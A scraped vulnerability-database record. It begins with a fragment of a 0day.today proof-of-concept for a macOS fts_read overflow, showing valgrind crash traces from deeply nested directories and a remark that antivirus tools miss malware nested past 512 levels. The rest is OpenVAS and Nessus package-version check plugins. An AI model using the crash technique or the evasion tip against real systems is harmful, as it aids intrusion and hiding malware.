B\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7\r\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8\r\n==1009== Invalid write of size 1\r\n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in 
/usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100001DAD: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== by 0x104809C8D: ???\r\n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd\r\n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100001B92: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== by 0x104809C8D: ???\r\n==1009== \r\n\r\n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/
B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B:\r\n==1009== Invalid read of size 1\r\n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x1000024A7: ??? (in /bin/ls)\r\n==1009== by 0x100001CFC: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? (in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd\r\n==1009== \r\n==1009== \r\n==1009== Process terminating with default action of signal 11 (SIGSEGV)\r\n==1009== Access not within mapped region at address 0x102D20318\r\n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib)\r\n==1009== by 0x1000024A7: ??? (in /bin/ls)\r\n==1009== by 0x100001CFC: ??? (in /bin/ls)\r\n==1009== by 0x100001A6F: ??? 
(in /bin/ls)\r\n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1009== by 0x1: ???\r\n==1009== by 0x104809C8A: ???\r\n==1009== If you believe this happened as a result of a stack\r\n==1009== overflow in your program's main thread (unlikely but\r\n==1009== possible), you can try to increase the size of the\r\n==1009== main thread stack using the --main-stacksize= flag.\r\n==1009== The main thread stack size used in this run was 8388608.\r\n==1009== \r\n==1009== HEAP SUMMARY:\r\n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks\r\n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated\r\n==1009== \r\n==1009== LEAK SUMMARY:\r\n==1009== definitely lost: 519 bytes in 6 blocks\r\n==1009== indirectly lost: 104 bytes in 6 blocks\r\n==1009== possibly lost: 0 bytes in 0 blocks\r\n==1009== still reachable: 1,645,151 bytes in 5,819 blocks\r\n==1009== suppressed: 26,225 bytes in 194 blocks\r\n==1009== Rerun with --leak-check=full to see details of leaked memory\r\n==1009== \r\n==1009== For counts of detected and suppressed errors, rerun with: -v\r\n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)\r\nSegmentation fault: 11\r\nMacMini:SCANME cxsecurity$\r\n\r\n\r\nIt looks like a buffer overflow in memmove(). Code\r\n\r\nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c\r\n\r\n\r\nThe same issue for 'find' which may be used in cron scripts like\r\n\r\n\r\n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print\r\n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print\r\n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \r\n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1;\r\n\r\n\r\nLet's see valgrind output.\r\n\r\n\r\nMacMini:SCANME cxsecurity$ valgrind find . 
-name \"R\"\r\n==1055== Memcheck, a memory error detector\r\n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\r\n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\r\n==1055== Command: find . -name R\r\n==1055== \r\nfind: ./.Trashes: Permission denied\r\n==1055== Invalid write of size 2\r\n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1000013FA: ??? (in /usr/bin/find)\r\n==1055== by 0x1000052AD: ??? (in /usr/bin/find)\r\n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1055== by 0x3: ???\r\n==1055== by 0x10480CC7F: ???\r\n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd\r\n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so)\r\n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib)\r\n==1055== by 0x1000013FA: ??? (in /usr/bin/find)\r\n==1055== by 0x1000052AD: ??? (in /usr/bin/find)\r\n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib)\r\n==1055== by 0x3: ???\r\n==1055== by 0x10480CC7F: ???\r\n...\r\n\r\nInvalid memory write without crashing.\r\n\r\n \r\nBTW:\r\nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. 
Eset32, Kaspersky etc.\r\n\r\n\r\n====== Thanks ===================================\r\nKacper and Smash_ from DEVILTEAM for technical support.\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24685"}], "openvas": [{"lastseen": "2019-05-29T18:33:30", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers\nto cause a denial of service (allocation failure and application\ncrash) during a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.", "modified": "2019-03-18T00:00:00", "published": "2018-02-07T00:00:00", "id": "OPENVAS:1361412562310891093", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891093", "title": "Debian LTS Advisory ([SECURITY] [DLA 1093-1] tiff security update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1093.nasl 14281 2019-03-18 14:53:48Z cfischer $\n#\n# Auto-generated from advisory DLA 1093-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the 
respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891093\");\n script_version(\"$Revision: 14281 $\");\n script_cve_id(\"CVE-2017-11335\", \"CVE-2017-12944\", \"CVE-2017-13726\", \"CVE-2017-13727\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1093-1] tiff security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:53:48 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00010.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", 
re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"tiff on Debian Linux\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n4.0.2-6+deb7u16.\n\nWe recommend that you upgrade your tiff packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers\nto cause a denial of service (allocation failure and application\ncrash) during a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a\nremote denial of service attack.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libtiff-doc\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff-opengl\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff5\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff5-alt-dev\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiff5-dev\", 
ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libtiffxx5\", ver:\"4.0.2-6+deb7u16\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2019-11-01T02:18:19", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers to\ncause a denial of service (allocation failure and application crash)\nduring a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nFor Debian 7 ", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-1093.NASL", "href": "https://www.tenable.com/plugins/nessus/103093", "published": "2017-09-11T00:00:00", "title": "Debian DLA-1093-1 : tiff security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1093-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103093);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/07/09 12:26:58\");\n\n script_cve_id(\"CVE-2017-11335\", \"CVE-2017-12944\", \"CVE-2017-13726\", \"CVE-2017-13727\");\n\n script_name(english:\"Debian DLA-1093-1 : tiff security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the Tag Image File\nFormat (TIFF) library and its associated tools.\n\nCVE-2017-11335\n\nA heap based buffer overflow via a PlanarConfig=Contig image, which\ncauses an out-of-bounds write (related to the ZIPDecode function). A\ncrafted input may lead to a remote denial of service attack or an\narbitrary code execution attack.\n\nCVE-2017-12944\n\nA mishandling of memory allocation for short files allows attackers to\ncause a denial of service (allocation failure and application crash)\nduring a tiff2pdf invocation.\n\nCVE-2017-13726\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nCVE-2017-13727\n\nA reachable assertion abort allows a crafted input to lead to a remote\ndenial of service attack.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n4.0.2-6+deb7u16.\n\nWe recommend that you upgrade your tiff packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/09/msg00010.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/tiff\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff-opengl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff5-alt-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiff5-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtiffxx5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libtiff-doc\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff-opengl\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff-tools\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff5\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff5-alt-dev\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiff5-dev\", reference:\"4.0.2-6+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtiffxx5\", reference:\"4.0.2-6+deb7u16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:40:45", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201612-37\n(Pixman: Buffer overflow)\n\n In pixman-general, careless computations done with the ‘dest_buffer’\n pointer may overflow, failing the buffer upper limit check.\n \nImpact :\n\n A remote attacker could possibly cause a Denial of Service 
condition, or\n execute arbitrary code with the privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-11-02T00:00:00", "id": "GENTOO_GLSA-201612-37.NASL", "href": "https://www.tenable.com/plugins/nessus/95740", "published": "2016-12-13T00:00:00", "title": "GLSA-201612-37 : Pixman: Buffer overflow", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-37.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95740);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2017/10/02 21:12:27 $\");\n\n script_xref(name:\"GLSA\", value:\"201612-37\");\n\n script_name(english:\"GLSA-201612-37 : Pixman: Buffer overflow\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-37\n(Pixman: Buffer overflow)\n\n In pixman-general, careless computations done with the ‘dest_buffer’\n pointer may overflow, failing the buffer upper limit check.\n \nImpact :\n\n A remote attacker could possibly cause a Denial of Service condition, or\n execute arbitrary code with the privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.x.org/archives/xorg-announce/2015-September/002637.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security.gentoo.org/glsa/201612-37\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Pixman users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=x11-libs/pixman-0.32.8'\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pixman\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"x11-libs/pixman\", unaffected:make_list(\"ge 0.32.8\"), vulnerable:make_list(\"lt 0.32.8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Pixman\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-10-28T21:00:39", 
"bulletinFamily": "scanner", "description": "The remote host is affected by a man-in-the-middle (MitM) information\ndisclosure vulnerability due to an error in the implementation of\nciphersuites that use AES in CBC mode with HMAC-SHA1 or HMAC-SHA256.\nThe implementation is specially written to use the AES acceleration\navailable in x86/amd64 processors (AES-NI). The error messages\nreturned by the server allow allow a man-in-the-middle attacker to\nconduct a padding oracle attack, resulting in the ability to decrypt\nnetwork traffic.", "modified": "2016-06-13T00:00:00", "id": "OPENSSL_AES_NI_PADDING_ORACLE.NASL", "href": "https://www.tenable.com/plugins/nessus/91572", "published": "2016-06-13T00:00:00", "title": "OpenSSL AES-NI Padding Oracle MitM Information Disclosure", "type": "nessus", "sourceData": "#TRUSTED 0fb281a3ebf948f329713d314d3da1ac93829cfe44bc153b317085dc6e4f059c6ebbd6f75a215c2f0f8997a147763a749aa7071ce3905a6f558c266f058241017bc4a89519e6e47fd5e89c21a83a487d55dbe054ed06216e15e3f848429bc3943651d56e0944fb65217f281ba5eb872ac05c5827f849b3f781584df1f6addbcd9976b51800622ca66b847f54493cb843a730658026b16baf414314fbc612ea452aec55c2e71140424cd4d296798f5d4c5188f0f9b039ad28f07d77f70efef42a09a0bc912084d9de4e2fc4f396b556bd60c53e83ade27ef0ba9ca293b7547ffa54d8981525120b206fc3de2f3202d5d91acab899c1ed68436ece43fb22630506236f29d5212ec2db1a6687fd7b23f1091ecad320f03a5363aa9d2447b7a4781ddf9ff1ef0570373004134fee731966d85e4868aa17d4e0e930b424331fb0b8557a871d8e535671b83ea24334dd88eb1709b52fe11dad0c5c1f2593709c23a76ffd35d64438dbe59fb7cc360cafcd0a3d3f20fc0c44df1c46d62db5bb2706995f0ee4991e29da0c82b6340f1dc7fbda94bc6f0eb278ff52ab8ee13d25a1fb6a6a8c049294f3a7edb888ebc1bc0df6f31969a4c23bcd48b598c6810391c6b3af6d66f3fa6d7cccae4d4de75fee5978207823bdb8ecce84afc2e82605ab9ed144020a0bd8f223669be695daf5d9b5e9f5044fd024345ce57c6b8ac1a7c020cc32d8\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(91572);\n script_version(\"1.12\");\n 
